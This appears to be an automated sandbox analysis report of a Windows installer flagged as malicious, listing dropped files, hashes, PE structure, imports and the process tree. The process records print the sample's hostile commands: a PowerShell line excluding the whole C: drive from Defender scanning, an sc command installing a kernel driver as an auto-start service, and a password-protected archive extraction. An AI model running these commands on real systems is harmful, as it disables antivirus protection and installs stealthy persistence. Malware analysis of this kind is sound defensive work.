                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):6144
                                                          Entropy (8bit):4.720366600008286
                                                          Encrypted:false
                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3598848
                                                          Entropy (8bit):7.004949099807939
                                                          Encrypted:false
                                                          SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                                          MD5:1D1464C73252978A58AC925ECE57F0FB
                                                          SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                                          SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                                          SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 11%
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3366912
                                                          Entropy (8bit):6.530548291878271
                                                          Encrypted:false
                                                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                          MD5:9902FA6D39184B87AED7D94A037912D8
                                                          SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                                          SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                                          SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                                          Malicious:true
                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                          Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3366912
                                                          Entropy (8bit):6.530548291878271
                                                          Encrypted:false
                                                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                          MD5:9902FA6D39184B87AED7D94A037912D8
                                                          SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                                          SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                                          SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                                          Malicious:true
                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):6144
                                                          Entropy (8bit):4.720366600008286
                                                          Encrypted:false
                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3598848
                                                          Entropy (8bit):7.004949099807939
                                                          Encrypted:false
                                                          SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                                          MD5:1D1464C73252978A58AC925ECE57F0FB
                                                          SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                                          SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                                          SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 11%
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:dropped
                                                          Size (bytes):406
                                                          Entropy (8bit):5.117520345541057
                                                          Encrypted:false
                                                          SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                                          MD5:9200058492BCA8F9D88B4877F842C148
                                                          SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                                          SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                                          SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                                          Malicious:false
                                                          Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.921329426572819
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 98.04%
                                                          • Inno Setup installer (109748/4) 1.08%
                                                          • InstallShield setup (43055/19) 0.42%
                                                          • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                          File name:#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                                                          File size:5'707'472 bytes
                                                          MD5:c17bd872bfa6b9e26aa03ad02ceaaca0
                                                          SHA1:a2cc5d1e3526ad5b415ba875b12e1e42d48411ce
                                                          SHA256:43a0b8a907d46b77e8695c8c00f90a6812f9bdb138d2ae53c1ce0d9b4362e610
                                                          SHA512:16c469e4e465b49c65d248cbc255e14f10e592c69f34284027a459839a129eb37ca75535369993a8d2aa8ce211e5b35974e13f64632257b37efd468b98d61f5f
                                                          SSDEEP:98304:XwREaHL2dH4jfHA43cQSl6GZkZmRzbmeoDWgo6UqI3J+LZotAVtfc0MJsI1dMwZO:lWmH4jfH7dSl6GZkM1Keo6gPUJOoiPMU
                                                          TLSH:98461222F3CBE43EE05D1B3716B2A25494FB7A606522AD5396ECB4ACCF350601D3E647
                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                          Icon Hash:0c0c2d33ceec80aa
                                                          Entrypoint:0x4a83bc
                                                          Entrypoint Section:.itext
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:6
                                                          OS Version Minor:1
                                                          File Version Major:6
                                                          File Version Minor:1
                                                          Subsystem Version Major:6
                                                          Subsystem Version Minor:1
                                                          Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                                          Instruction
                                                          push ebp
                                                          mov ebp, esp
                                                          add esp, FFFFFFA4h
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          xor eax, eax
                                                          mov dword ptr [ebp-3Ch], eax
                                                          mov dword ptr [ebp-40h], eax
                                                          mov dword ptr [ebp-5Ch], eax
                                                          mov dword ptr [ebp-30h], eax
                                                          mov dword ptr [ebp-38h], eax
                                                          mov dword ptr [ebp-34h], eax
                                                          mov dword ptr [ebp-2Ch], eax
                                                          mov dword ptr [ebp-28h], eax
                                                          mov dword ptr [ebp-14h], eax
                                                          mov eax, 004A2EBCh
                                                          call 00007FBBE9312BD5h
                                                          xor eax, eax
                                                          push ebp
                                                          push 004A8AC1h
                                                          push dword ptr fs:[eax]
                                                          mov dword ptr fs:[eax], esp
                                                          xor edx, edx
                                                          push ebp
                                                          push 004A8A7Bh
                                                          push dword ptr fs:[edx]
                                                          mov dword ptr fs:[edx], esp
                                                          mov eax, dword ptr [004B0634h]
                                                          call 00007FBBE93A455Bh
                                                          call 00007FBBE93A40AEh
                                                          lea edx, dword ptr [ebp-14h]
                                                          xor eax, eax
                                                          call 00007FBBE939ED88h
                                                          mov edx, dword ptr [ebp-14h]
                                                          mov eax, 004B41F4h
                                                          call 00007FBBE930CC83h
                                                          push 00000002h
                                                          push 00000000h
                                                          push 00000001h
                                                          mov ecx, dword ptr [004B41F4h]
                                                          mov dl, 01h
                                                          mov eax, dword ptr [0049CD14h]
                                                          call 00007FBBE93A00B3h
                                                          mov dword ptr [004B41F8h], eax
                                                          xor edx, edx
                                                          push ebp
                                                          push 004A8A27h
                                                          push dword ptr fs:[edx]
                                                          mov dword ptr fs:[edx], esp
                                                          call 00007FBBE93A45E3h
                                                          mov dword ptr [004B4200h], eax
                                                          mov eax, dword ptr [004B4200h]
                                                          cmp dword ptr [eax+0Ch], 01h
                                                          jne 00007FBBE93AB2CAh
                                                          mov eax, dword ptr [004B4200h]
                                                          mov edx, 00000028h
                                                          call 00007FBBE93A09A8h
                                                          mov edx, dword ptr [004B4200h]
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          .rsrc0xcb0000x110000x11000d767418641bf302610db416464cb7807False0.18785903033088236data3.721360641780582IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                                                          RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                                                          RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                                                          RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                                                          RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                                                          RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                                                          RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                                                          RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                                                          RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                                                          RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                                                          RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                                                          RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                                                          RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                                                          RT_STRING0xd8e000x3f8data0.3198818897637795
                                                          RT_STRING0xd91f80x2dcdata0.36475409836065575
                                                          RT_STRING0xd94d40x430data0.40578358208955223
                                                          RT_STRING0xd99040x44cdata0.38636363636363635
                                                          RT_STRING0xd9d500x2d4data0.39226519337016574
                                                          RT_STRING0xda0240xb8data0.6467391304347826
                                                          RT_STRING0xda0dc0x9cdata0.6410256410256411
                                                          RT_STRING0xda1780x374data0.4230769230769231
                                                          RT_STRING0xda4ec0x398data0.3358695652173913
                                                          RT_STRING0xda8840x368data0.3795871559633027
                                                          RT_STRING0xdabec0x2a4data0.4275147928994083
                                                          RT_RCDATA0xdae900x10data1.5
                                                          RT_RCDATA0xdaea00x310data0.6173469387755102
                                                          RT_RCDATA0xdb1b00x2cdata1.1818181818181819
                                                          RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                                                          RT_VERSION0xdb2980x584dataEnglishUnited States0.2804532577903683
                                                          RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                                                          DLLImport
                                                          kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                          comctl32.dllInitCommonControls
                                                          user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                          oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                          advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                                          NameOrdinalAddress
                                                          __dbk_fcall_wrapper20x40fc10
                                                          dbkFCallWrapperAddr10x4b063c
                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States
                                                          No network behavior found

                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:01:42:16
                                                          Start date:23/12/2024
                                                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe"
                                                          Imagebase:0x470000
                                                          File size:5'707'472 bytes
                                                          MD5 hash:C17BD872BFA6B9E26AA03AD02CEAACA0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:Borland Delphi
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:01:42:16
                                                          Start date:23/12/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$10404,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe"
                                                          Imagebase:0x860000
                                                          File size:3'366'912 bytes
                                                          MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:Borland Delphi
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:01:42:17
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                          Imagebase:0x7ff6e3d50000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:01:42:17
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:01:42:18
                                                          Start date:23/12/2024
                                                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
                                                          Imagebase:0x470000
                                                          File size:5'707'472 bytes
                                                          MD5 hash:C17BD872BFA6B9E26AA03AD02CEAACA0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:Borland Delphi
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:6
                                                          Start time:01:42:18
                                                          Start date:23/12/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$40418,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
                                                          Imagebase:0xaa0000
                                                          File size:3'366'912 bytes
                                                          MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:Borland Delphi
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:01:42:21
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:01:42:21
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:01:42:22
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:01:42:22
                                                          Start date:23/12/2024
                                                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                                          Imagebase:0xf00000
                                                          File size:831'200 bytes
                                                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          • Detection: 0%, Virustotal, Browse
